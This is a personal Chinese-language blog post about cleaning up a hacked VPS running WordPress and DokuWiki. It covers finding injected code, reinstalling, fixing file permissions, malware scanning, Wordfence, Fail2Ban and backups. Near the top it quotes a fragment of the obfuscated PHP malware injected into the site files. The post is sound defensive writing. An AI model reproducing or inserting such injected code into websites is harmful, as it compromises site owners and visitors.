被黑网站如何起死回生
其实这次已经不是第一次服务器被黑了,之前也有过一次。最后也查到了被感染的病毒,也查到了病毒来源网站,把那个网站整个IP段都给Ban掉了, 总算清静了一些。
而这次被黑的是VPS上运行的Wordpress和Dokuwiki. 一直以来都运行良好,并未出现什么大问题。
怎么发现被黑了
最初是发现Wiki网站主页无法显示正常,只能显示网页头,里面内容都无法正常渲染。然后找到对应的index.php, 打开内容,发现被插入了大量奇怪的代码,然后在整个目录”grep -R”也发现了大量的文件都有相同的内容,其中就同时包括Wordpress和Dokuwiki目录,看到之后就惊呆了,本以为网站被黑还是小概念的事情,没想到现在已经成为标准和肉鸡了。
被插入的代码大概长这样
`Y,2SR=:0F; >9Zj; =cOX2A>o846jMHxJlc6892ZGD:rHWY2O1 UqkU==ReU+3Vbew.3 srULlaFo4ai.4G=jIjt5thsif5:Or9YRxXghW1R.XVBk9c5L+M0Lq KLaLvW=WBo0;p0726koev7Y6=Nc2PII:6jLdwZQ:6zfK3gT=AGl:,>jtyIM2YV;.xqNZbYV+97Q.YU dPLnK7HBPbqw7VD.NQeb9SV;IiMdPk3d1J6R5.ydg:DB>6LU8A;N=y36;g0Q04ms73=K;;6WWCn2SC>YXBm2 L9HJwM. 12jR 0qHzdZ3PhQ,E7xiCT Y7ZJk W5bPTI0F>xmP2YroNo07=VyuScmnFQxnA+THRkD R3j9sePjfdAQiTX1yVRz6nxspk6FF d4BTTARtJtsUeqpsui844RUfU2J+-KG2=DqN=R TR1+nCgHWU WaaVNxLTr7mj-77ArJHM Ogf .6;;3PchaWedY; 9xrgtnM'; $GNvfmG=$syxykHO('', '34iY5K7OF:=SeU>RSJJrMCOO66;EDylZ4AU1UzFz6DOIR3ELMJ.u6xu:,FTIoVR0NWSF09n2R3Y9UHGBL>hh+oRQMgHQIGJIGiiD8:NKQQ5PkPrOXC0q20YDmlJ R1yZkxSS70OnlEFO2:N,RGm-aNn;nR3AOYYGz1,MS>W3tH3.AI7YiM3Y8=POIoGl34T6HHvnXltRLgcHAV-Zn,,T.
既然被黑了,自然就想到了,Digital Ocean应该会发相关的Warning邮件吧,一查GMail,果然,好几封相关邮件,而且Google也发了相关的警告,并把网站拉入了黑名单。邮件最早是在2/28号就已经发出了,只是没有注意到。网站带病毒裸奔了这么多天。
再次感受到了互联网的不安全,暴露在外网的服务器随时都有被黑的风险。
## 如何手工修复
Wordpress手工修复参考了这篇文章
- https://www.wpzhiku.com/what-to-do-when-wordpress-was-hacked/
基本上大概相当于重装了。
Dokuwiki修复参考的是官方的upgrade教程
- https://www.dokuwiki.org/install:upgrade
对相关目录权限也进行了修复
find . -type d -exec chmod 755 {} \;
find . -iname "*.php" -exec chmod 644 {} \;
chown www-data:www-data . -R
```
对网站进行简单加困
- 使用php scanner进行php的全站扫描,虽然有些文件误报,但还是好用的
-
https://github.com/scr34m/php-malware-scanner.git
- Wordpress/Dokuwiki密码进行了更新,删除不需要的user
- Wordpress安装了Wordfence, 虽然是免费版本,但已经基本够用了
- 可以自动/定时扫描目录文件,如果有文件改动会提示
- 如果有文件已经被感染,可以提示一键修复,并且有View/Diff功能,很赞
-
自动Block非法的登录IP
- 重新检查修复了Fail2Ban服务
- 安装了aide: sudo apt-get install aide
后继
功与防会一直延续,常在河边走,哪能不湿鞋。而且目前感觉并未完全清除所有的感染文件,今天又发现了几个Wordpress php文件被修改了,还好安装了Wordfence, 直接一键修复。生化危机的即视感,明显就是明完待继的节奏。
备份的重要性,再一次体现出来,在Digital Ocean上购买了一个Volume, 直接当硬盘mount上。写了备份bash script, crontab定期备份,script很简单,就是Wordpress/Dokuwiki进行了打包压缩:(github: https://github.com/pjq/hack_tools.git)